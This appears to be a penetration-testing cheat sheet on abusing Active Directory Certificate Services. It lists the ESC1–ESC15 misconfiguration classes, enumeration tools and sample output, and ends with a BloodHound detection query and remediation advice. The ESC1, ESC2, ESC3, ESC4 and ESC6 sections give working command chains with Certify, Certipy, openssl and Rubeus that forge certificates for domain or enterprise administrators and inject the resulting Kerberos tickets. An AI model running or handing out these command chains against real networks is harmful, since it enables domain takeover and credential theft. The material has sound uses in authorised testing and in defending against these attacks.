AD CS

PKI ?

nxc ldap <ip> -u user -p pass -M adcs
LogoExploit ESC8 (ADCS) | NetExec

Or run PingCastle or Certify

ESC

LogoActive Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable MessShellph1sh's Blog
Escalation
Definition

ESC1

Enrolee can request cert for ANY user

ESC2

Any purpose or no EKU (potentially dangerous)

ESC3

Request an enrollement agent certificate and use it to request cert on behalf of ANY user

ESC4

Overly permissive ACLs on templates

ESC5

Poor access control on CA server, CA server computer object, etc.

ESC6

EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user

ESC7

Poor access control on roles on CA authority like "CA Administrator" and "Certificate Manager"

ESC8

NTLM relay to HTTP enrollement endpoints

NXC

Vulnerable Template

nxc smb IP -u user -d domain.local -p password -M enum_ca

Masky

If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT

Source: https://x.com/mpgn_x64/status/1584863925744521216

Tools

Locksmith

LogoGitHub - TrimarcJake/Locksmith: A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate ServicesGitHub
# Run all scans
Invoke-Locksmith -Scan All

Certify

LogoGitHub - GhostPack/Certify: Active Directory certificate abuse.GitHub
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/Certify.exe
LogoADCS Attacks with Certipyserioton

Enumeration

AD CS in the target forest

Certify.exe cas

Templates

Certify.exe find

Vulnerable templates

Certify.exe find /vulnerable

Certi

LogoGitHub - zer1t0/certi: ADCS abuserGitHub
$ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC3 -B 3
Name: User
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: Administrator
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate

Certipy

LogoGitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Vulnerable template

# certipy find -u ca_operator -p NewPassword0xss0rz -dc-ip 10.10.11.41 -vulnerable -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'domain-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'domain-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'domain-DC01-CA'
[*] Saved BloodHound data to '20241126073356_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241126073356_Certipy.txt'
[*] Saved JSON output to '20241126073356_Certipy.json'

 # cat 20241126073356_Certipy.txt | grep ESC
      ESC9                              : 'DOMAIN.HTB\\operator ca' can enroll and template has no security extension
 
 # cat 20241126073356_Certipy.txt

PSPKIAudit

Only ESC1 to ESC8

LogoGitHub - GhostPack/PSPKIAudit: PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.GitHub

Metasploit

LogoAttacking AD CS ESC Vulnerabilities Using MetasploitMetasploit Documentation Penetration Testing Software, Pen Testing Security

ADCSKiller

LogoGitHub - grimlockx/ADCSKiller: An ADCS Exploitation Automation Tool Weaponizing Certipy and CoercerGitHub

Practice and explanation

LogoGitHub - arth0sz/Practice-AD-CS-Domain-Escalation: Introductory guide on the configuration and subsequent exploitation of Active Directory Certificate Services with Certipy. Based on the white paper Certified Pre-Owned.GitHub

ESC1

"VulnTemplate" has ENROLLEE_SUPPLIES_SUBJECT value for msPKI-Certificates-Name-Flag

Certify.exe find /enrolleeSuppliesSubject

"VulnTemplate" allows enrollment to RDPUsers group.

  1. Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"VulnTemplate" /altname:administrator

  1. Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:passw0rd /ptt

ESC2

Find vulnerable templates

certipy find -u 'bspears' -p REDACTED -dc-ip 10.10.0.10 -vulnerable -enabled

Exploit

certipy-ad req -u 'bspears' -p 'REDACTED' \ 
-dc-ip '10.10.0.10' \ 
-target 'dc01.foobar.com' \ 
-ca 'foobar-CA' \ 
-template 'ESC2_User'-debug 
certipy-ad req -u 'bspears' -p 'REDACTED' -dc-ip '10.10.0.10' \ 
-target 'dc01.foobar.com'  
-ca 'foobar-CA' \ 
-template 'User' \ 
-on-behalf-of 'example\administrator' \ 
-pfx bspears.pfx -debug

ESC3

Request an enrollement agent certificate and use it to request cert on behalf of ANY user

"VulnTemplateEnrollement-Agent" allows Domain users to enroll and has 'Certificate Request Agent' EKU

"VulnTemplateEnrollement-Users" has an Application Policy Issuance Requirement of Certificate Request Agent and has an EKU that allows for domain authentication

Escalation to DA

child.parent.local: child domain

parent.local: parent domain

  1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Agent

  1. Convert cert.pem to pfx and use it to request a cert on behalf on DA using "VulnTemplateEnrollement-Users"

openssl.exe pkcs12 -in C:\path\to\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3agent.pfx 
Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:child\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

  1. Convert from cert.pem to pfx, request DA TGT and inject it

openssl.exe pkcs12 -in C:\path\to\DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3user-DA.pfx  
Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:passw0rd /ptt

Escalation to EA

  1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template - see Escalation to DA

  2. Convert cert.pem to pfx and use it to request a cert on behalf on EA using "VulnTemplateEnrollement-Users

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:parent.local\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

  1. Request EA TGT and inject it

Rubeus.exe asktgt /user:parent.local\administrator /certificate:esc3user-EA.pfx /dc:dc.parent.local /password:passw0rd /ptt

ESC4

certipy template -u billy@foobar.com -p REDACTED -template ESC4Certificate_FOOBAR -dc-ip <DC_IP> -save-old
certipy req -u 'billy@foobar.com' -p 'REDACTED' -dc-ip '10.10.1.100' -target 'foobar-CA.foobar.com ' -ca 'foobar-CA' -template 'ESC4Certificate_FOOBAR' -upn 'DA_Dan@foobar.com' 
certipy auth -pfx DA_Dan.pfx

Clean up

certipy template 
-u user@foobar.com \
-p REDACTED \
-template ESC4Certificate_FOOBAR \
-dc-ip <DC_IP> \
--configuration 'ESC4Certificate_FOOBAR.json'

ESC6

EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user from a template that allow enrollment to low-priv user

"Vuln-Integration" grants enrollment to RDPUsers group.

  1. Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"Vuln-Integration" /altname:administrator

  1. Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:passw0rd /ptt

ESC8 - PetitPotam

NTLM relay to HTTP enrollement endpoints

Windows Exploit

ESC9

Certifried - CVE-2022-26923

ADCSCoercePotato

CertPotato

KrbRelay-SMBServer

ADCS ESC15 (EKUwu) - CVE-2024-49019

The TrustedSec team tested the CVE-2024-49019 vulnerability across multiple clients, finding that 10 out of 15 environments were at risk

Detection: Bloodhound query

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

Credit: @SpecterOps

Exploitation

From Child to Forest

Relay Attack on WinReg RPC Client

Remediation

The following security controls should be implemented to mitigate an ESC1 AD CS compromise:

  • Remove the Enrolee Supplies Subject flag. Do not allow users to provide their own SAN in the certificate signing request for templates configured for client authentication. Templates configured with the Enrolee Supplies Subject flag allow a user to provide their own SAN.

  • Restrict standard user object permissions on certificate templates. Standard user objects should not have write permissions on certificate templates. User objects with write permissions may be able to change enrolment permissions or configure additional settings to make the certificate template vulnerable.

  • Remove vulnerable AD CS CA configurations. Ensure that the CA is not configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. When configured, this allows a SAN to be provided on any certificate template.

  • Require CA Certificate Manager approval for certificate templates that allow the SAN to be supplied. This ensures certificate templates that require CA certificate manager approval are not issued automatically when requested; instead, they must be approved using certificate manager before the certificate is issued.

  • Remove EKUs that enable user authentication. This prevents malicious actors from exploiting the certificate to authenticate as other users.

  • Limit access to AD CS CA servers to only privileged users that require access. This may be a smaller subset of privileged users than the Domain Admins security group and reduces the number of opportunities for malicious actors to gain access to CA servers.

  • Restrict privileged access pathways to AD CS CA servers to jump servers and secure admin workstations using only the ports and services that are required for administration. AD CS servers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

  • Only use AD CS CA servers for AD CS and do not install any non-security-related services or applications. This reduces the attack surface of AD CS CA servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD CS CA server.

  • Encrypt and securely store backups of AD CS CA servers and limit access to only Backup Administrators. Backups of AD CS CA servers need to be afforded the same security as the actual AD CS CA servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD CS CA servers.

  • Centrally log and analyse AD CS CA server logs in a timely manner to identify malicious activity. If malicious actors gain privileged access to a CA server, this activity should be identified as soon as possible to respond and limit the impact.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Detection

ADCS Honeypot

Detection

Resources

PreviousLSASS secretsNextDPAPI

Last updated